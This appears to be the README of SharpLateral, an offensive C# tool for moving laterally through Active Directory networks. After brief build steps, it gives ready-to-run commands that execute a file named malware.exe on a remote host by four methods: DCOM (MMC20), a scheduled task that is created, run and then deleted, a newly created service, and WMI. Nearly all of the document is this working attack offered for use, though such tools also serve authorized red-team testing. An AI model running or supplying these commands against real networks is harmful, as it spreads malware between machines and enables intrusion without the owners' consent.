SharpLateral is a tool that includes 4 different methods for performing lateral movement in the AD environment and is written in C# language.
Below 3rd party libraries are used in this project.
TaskScheduler
https://github.com/dahall/TaskScheduler
Fody
https://github.com/Fody/Fody
Load the Visual Studio project up and go to "Tools" > "NuGet Package Manager" > "Package Manager Settings"
Open "NuGet Package Manager" > "Package Sources"
Install the FodyInstall-Package Costura.Fody -Version 3.3.3
Install the TaskschedulerInstall-Package TaskScheduler -Version 2.8.11
SharpLateral aims to perform lateral movement with the following methods:
-
DCOM
-
SERVICE
-
WMI
-
SCHEDULED TASKS
DCOM:
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
Executes Malware on given hostname via MMC20
Scheduled Task:
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
Creates Task,Executes Malware,Deletes Task
Service:
SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
Creates Service and executes malware with it
WMI:
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
Executes malware via WMI on remote host